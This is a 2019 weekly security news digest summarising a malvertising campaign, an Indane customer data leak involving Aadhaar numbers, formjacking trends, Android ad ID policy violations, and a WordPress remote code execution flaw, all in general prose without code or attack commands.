Application Security Weekly Review, Week 8 2019
A massive malvertising campaign targeting US users, Aadhaar data exposure of Indian LPG gas company clients, critical flaw in WordPress, and more.
It’s been an interesting week in the world of cyber security. In this review we compiled a list of the most noteworthy cybersecurity headlines, including massive malvertising campaign targeting US users, Aadhaar data exposure of Indian company Indane clients, critical flaw in WordPress, and more.
Massive malvertising campaign hit US users over Presidents' Day weekend
Over Presidents' Day weekend researchers at cyber-security firm Confiant uncovered a massive malvertising campaign aimed at US residents. In only three days Confiant recorded nearly 800 million malicious ad impressions delivered as a part of the campaign. When clicked, the ads would redirect users to a wide variety of malicious sites, and unlike other similar malware-oriented operations, this one’s goal was to steal user personal and financial information by tricking them into entering these details in order forms for different fake products. Later, crooks would sell collected data or use it in other fraudulent operations.
According to the researchers, this group, which they named eGobbler, has been active for months, but ramped up its efforts over the holidays, counting on that that the campaign would be more successful during a time when ad operations teams are offline or less available to deal with security issues.
Official website of Indian state-owned LPG gas company Indane leaked personal details of 6.7 million customers
Official website of Indian LPG gas company Indane has being leaking personal information of its clients, including their Aadhaar numbers. The vulnerability, which stems from lack of authentication on the Indane online dealers portal, could allow any unauthenticated user to gain access to hundreds of thousands of customers data, including their names, addresses and the Aadhaar numbers.
Initially the issue was discovered by an anonymous Indian researcher, who shared his findings with French security researcher Baptiste Robert (aka "Elliot Alderson"). During his own analysis, Robert discovered another vulnerability in Indane mobile app, which let him find out dealer usernames. According to the researcher, attackers with knowledge of dealer usernames can actually steal millions of Indian citizens data from the Indane website.
Robert informed Indane about the issue, but the company didn’t acknowledge his report. The owner of Indane, Indian Oil Corp Ltd. denied the data leak stating that Indane website doesn’t store Aadhaar numbers.
Formjacking becomes a quick and easy way for cybercriminals to get rich
With the decline in profit from ransomware attacks and cryptojacking cybercriminals more often turn to alternative methods, such as formjacking. This attack method is pretty simple: criminals insert malicious code into retailers' websites and steal customers' payment card data. According to Symantec's Internet Security Threat Report, every month during 2018 threat actors were able to compromise more than 4,800 websites, inserting JavaScript code in order to steal payment information such as debit and credit cards from customers of eCommerce sites.
Considering that each stolen card can fetch up to $45 on underground markets, ten stolen cards from each compromised website could bring the hackers roughly $2.2 million per month.
18,000+ Android apps violate Google's ad ID policies
More than 18,000 Android apps violate Google Play’s advertising identifier (ad ID) policies and users’ privacy, revealed a report from mobile privacy research group AppCensus. The researchers found that the apps in question that should only be collecting a digital "advertising ID" from a phone as a means to serve up targeted ads, collect persistent device identifiers, including serial numbers, IMEI, WiFi MAC addresses, SIM card serial numbers etc., which cannot be erased (unlike the advertising ID). As a result, the apps can still identify user devices, even if their owners decide to reset the advertising ID.
The Google’s policy forbids the advertising identifier to be connected to personally identifiable information or associated with any persistent device identifier, but in reality, thousands of applications do not comply with the policy. According to AppCensus, currently 18,000+ Android apps are in violation of Google Play’s ad ID policy, including some highly popular applications with hundreds of million downloads and in some cases with over 1 billion downloads.
Critical vulnerability in WordPress could allow complete website takeover
Security experts found a critical remote code execution vulnerability in WordPress, which remained uncovered for 6 years. The flaw affects all WordPress versions, including the latest version 5.0.3. and could be exploited for a full remote website takeover.
The attack relies on the way WordPress image management system handles Post Meta entries that store information like description, size, creator, and other meta information of uploaded images. Successful exploitation requires an attacker to have an access to an account with at least ‘author‘ privileges on a target WordPress site. Then the attacker could use two separate vulnerabilities (Path Traversal and Local File Inclusion) in WordPress core to execute arbitrary PHP code on the underlying server.
WordPress team closed an opportunity of the exploitation of the flaw in WordPress versions 5.0.1 and 4.9.9 with release of the patch, which made impossible for unauthorized users to set arbitrary Post Meta entries. However, the Path Traversal issue still remains unpatched and can be exploited if the site has 3rd-party plugins installed that incorrectly handle POST metadata.